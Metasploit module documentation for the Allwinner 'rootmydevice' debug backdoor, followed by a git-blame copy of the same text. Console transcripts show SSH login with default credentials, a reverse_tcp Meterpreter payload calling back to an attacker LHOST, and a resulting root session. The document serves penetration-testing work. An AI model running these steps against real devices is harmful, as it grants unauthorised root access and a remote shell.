documentation/modules/exploit/multi/local/allwinner_backdoor.md

## Vulnerable Application

Vulnerable Allwinner SoC chips: H3, A83T or H8 which rely on Kernel 3.4.

Vulnerable OS:

* all OS images available for Orange Pis
* any for FriendlyARM's NanoPi M1
* SinoVoip's M2+ and M3
* Cuebietech's Cubietruck +
* Linksprite's pcDuino8 Uno

Exploitation may be possible against Dragon (x10) and Allwinner Android tablets.

This module attempts to exploit a debug backdoor privilege escalation in
Allwinner SoC based devices. Implements the Allwinner privilege escalation
as documented in [Metasploit issue #6869](https://github.com/rapid7/metasploit-framework/issues/6869).
It is a simple debug kernel module that, when "rootmydevice" is echoed to
the process, it escalates the shell to root.


## Verification Steps

To use this module, you need a vulnerable device.

An Orange Pi (PC model) running Lubuntu 14.04 v0.8.0 works, but other OSes for the device (as well as other devices) are also vulnerable.

1. Start `msfconsole`
1. Get a session
1. Do: `use exploit/multi/local/allwinner_backdoor`
1. Do: `set SESSION [SESSION]`
1. Do: `set LHOST [LHOST]`
1. Do: `run`
1. You should get a new *root* session


## Options


## Scenarios

### Orange PI running Ubuntu 14.04 (Linux 3.4.39)

- `use auxiliary/scanner/ssh/ssh_login`

```
msf auxiliary(ssh_login) > set username orangepi
username => orangepi
msf auxiliary(ssh_login) > set password orangepi
password => orangepi
msf auxiliary(ssh_login) > set rhosts 192.168.2.21
rhosts => 192.168.2.21
msf auxiliary(ssh_login) > exploit

[*] 192.168.2.21:22 SSH - Starting bruteforce
[+] 192.168.2.21:22 SSH - Success: 'orangepi:orangepi' 'uid=1001(orangepi) gid=1001(orangepi) groups=1001(orangepi),27(sudo),29(audio)
Linux orangepi 3.4.39 #41 SMP PREEMPT Sun Jun 21 13:09:26 HKT 2015 armv7l armv7l armv7l GNU/Linux '
[!] No active DB -- Credential data will not be saved!
[*] Command shell session 1 opened (192.168.2.229:33673 -> 192.168.2.21:22) at 2016-05-17 21:55:27 -0400
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

- `use exploit/multi/local/allwinner_backdoor`

```
msf exploit(allwinner_backdoor) > set verbose true
verbose => true
msf exploit(allwinner_backdoor) > set session 1
session => 1
msf exploit(allwinner_backdoor) > set payload linux/armle/meterpreter/reverse_tcp
payload => linux/armle/meterpreter/reverse_tcp
msf exploit(allwinner_backdoor) > set lhost 192.168.2.117
lhost => 192.168.2.117
msf exploit(allwinner_backdoor) > check
[*]  The target appears to be vulnerable.
msf exploit(allwinner_backdoor) > exploit
```

Successful exploitation:

```
[*] Started reverse TCP handler on 192.168.2.117:4444
[*] Transmitting intermediate stager...(136 bytes)
[*] Sending stage (374540 bytes) to 192.168.2.248
[+] Backdoor Found, writing payload to /tmp/odzVx.elf
[*] Max line length is 65537
[*] Writing 284 bytes in 1 chunks of 843 bytes (octal-encoded), using printf
[+] Escalating
[*] Transmitting intermediate stager...(136 bytes)
[*] Sending stage (374540 bytes) to 192.168.2.248
[*] Meterpreter session 2 opened (192.168.2.117:4444 -> 192.168.2.248:49472) at 2016-09-22 21:56:50 -0400

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : 192.168.2.248
OS           : Ubuntu 14.04 (Linux 3.4.39)
Architecture : armv7l
Meterpreter  : armle/linux
```
modules/exploits/multi/local: Resolve Rubocop and msftidy_docs violations 2023-01-28 15:02:24 +11:00			`## Vulnerable Application`
Fixes from review 2018-02-03 11:23:58 -05:00
modules/exploits/multi/local: Resolve Rubocop and msftidy_docs violations 2023-01-28 15:02:24 +11:00			`Vulnerable Allwinner SoC chips: H3, A83T or H8 which rely on Kernel 3.4.`
post to local conversion 2016-09-22 22:08:24 -04:00
modules/exploits/multi/local: Resolve Rubocop and msftidy_docs violations 2023-01-28 15:02:24 +11:00			`Vulnerable OS:`
post to local conversion 2016-09-22 22:08:24 -04:00
modules/exploits/multi/local: Resolve Rubocop and msftidy_docs violations 2023-01-28 15:02:24 +11:00			`* all OS images available for Orange Pis`
			`* any for FriendlyARM's NanoPi M1`
			`* SinoVoip's M2+ and M3`
			`* Cuebietech's Cubietruck +`
			`* Linksprite's pcDuino8 Uno`
post to local conversion 2016-09-22 22:08:24 -04:00
modules/exploits/multi/local: Resolve Rubocop and msftidy_docs violations 2023-01-28 15:02:24 +11:00			`Exploitation may be possible against Dragon (x10) and Allwinner Android tablets.`

			`This module attempts to exploit a debug backdoor privilege escalation in`
			`Allwinner SoC based devices. Implements the Allwinner privilege escalation`
			`as documented in [Metasploit issue #6869](https://github.com/rapid7/metasploit-framework/issues/6869).`
			`It is a simple debug kernel module that, when "rootmydevice" is echoed to`
			`the process, it escalates the shell to root.`


			`## Verification Steps`

			`To use this module, you need a vulnerable device.`

			`An Orange Pi (PC model) running Lubuntu 14.04 v0.8.0 works, but other OSes for the device (as well as other devices) are also vulnerable.`

			1. Start `msfconsole`
			`1. Get a session`
			1. Do: `use exploit/multi/local/allwinner_backdoor`
			1. Do: `set SESSION [SESSION]`
			1. Do: `set LHOST [LHOST]`
			1. Do: `run`
			`1. You should get a new root session`


			`## Options`


			`## Scenarios`

			`### Orange PI running Ubuntu 14.04 (Linux 3.4.39)`
post to local conversion 2016-09-22 22:08:24 -04:00
			- `use auxiliary/scanner/ssh/ssh_login`

			```
			`msf auxiliary(ssh_login) > set username orangepi`
			`username => orangepi`
			`msf auxiliary(ssh_login) > set password orangepi`
			`password => orangepi`
			`msf auxiliary(ssh_login) > set rhosts 192.168.2.21`
			`rhosts => 192.168.2.21`
			`msf auxiliary(ssh_login) > exploit`

			`[*] 192.168.2.21:22 SSH - Starting bruteforce`
modules/exploits/multi/local: Resolve Rubocop and msftidy_docs violations 2023-01-28 15:02:24 +11:00			`[+] 192.168.2.21:22 SSH - Success: 'orangepi:orangepi' 'uid=1001(orangepi) gid=1001(orangepi) groups=1001(orangepi),27(sudo),29(audio)`
			`Linux orangepi 3.4.39 #41 SMP PREEMPT Sun Jun 21 13:09:26 HKT 2015 armv7l armv7l armv7l GNU/Linux '`
post to local conversion 2016-09-22 22:08:24 -04:00			`[!] No active DB -- Credential data will not be saved!`
			`[*] Command shell session 1 opened (192.168.2.229:33673 -> 192.168.2.21:22) at 2016-05-17 21:55:27 -0400`
			`[*] Scanned 1 of 1 hosts (100% complete)`
			`[*] Auxiliary module execution completed`
			```

			- `use exploit/multi/local/allwinner_backdoor`

			```
			`msf exploit(allwinner_backdoor) > set verbose true`
			`verbose => true`
			`msf exploit(allwinner_backdoor) > set session 1`
			`session => 1`
update documentation to point to meterpreter again 2017-04-26 17:49:08 -05:00			`msf exploit(allwinner_backdoor) > set payload linux/armle/meterpreter/reverse_tcp`
			`payload => linux/armle/meterpreter/reverse_tcp`
post to local conversion 2016-09-22 22:08:24 -04:00			`msf exploit(allwinner_backdoor) > set lhost 192.168.2.117`
			`lhost => 192.168.2.117`
			`msf exploit(allwinner_backdoor) > check`
			`[*] The target appears to be vulnerable.`
			`msf exploit(allwinner_backdoor) > exploit`
			```

modules/exploits/multi/local: Resolve Rubocop and msftidy_docs violations 2023-01-28 15:02:24 +11:00			`Successful exploitation:`
post to local conversion 2016-09-22 22:08:24 -04:00
			```
update documentation to point to meterpreter again 2017-04-26 17:49:08 -05:00			`[*] Started reverse TCP handler on 192.168.2.117:4444`
post to local conversion 2016-09-22 22:08:24 -04:00			`[*] Transmitting intermediate stager...(136 bytes)`
			`[*] Sending stage (374540 bytes) to 192.168.2.248`
			`[+] Backdoor Found, writing payload to /tmp/odzVx.elf`
			`[*] Max line length is 65537`
			`[*] Writing 284 bytes in 1 chunks of 843 bytes (octal-encoded), using printf`
			`[+] Escalating`
			`[*] Transmitting intermediate stager...(136 bytes)`
			`[*] Sending stage (374540 bytes) to 192.168.2.248`
			`[*] Meterpreter session 2 opened (192.168.2.117:4444 -> 192.168.2.248:49472) at 2016-09-22 21:56:50 -0400`

			`meterpreter > getuid`
			`Server username: uid=0, gid=0, euid=0, egid=0`
			`meterpreter > sysinfo`
			`Computer : 192.168.2.248`
			`OS : Ubuntu 14.04 (Linux 3.4.39)`
			`Architecture : armv7l`
			`Meterpreter : armle/linux`
update documentation to point to meterpreter again 2017-04-26 17:49:08 -05:00			```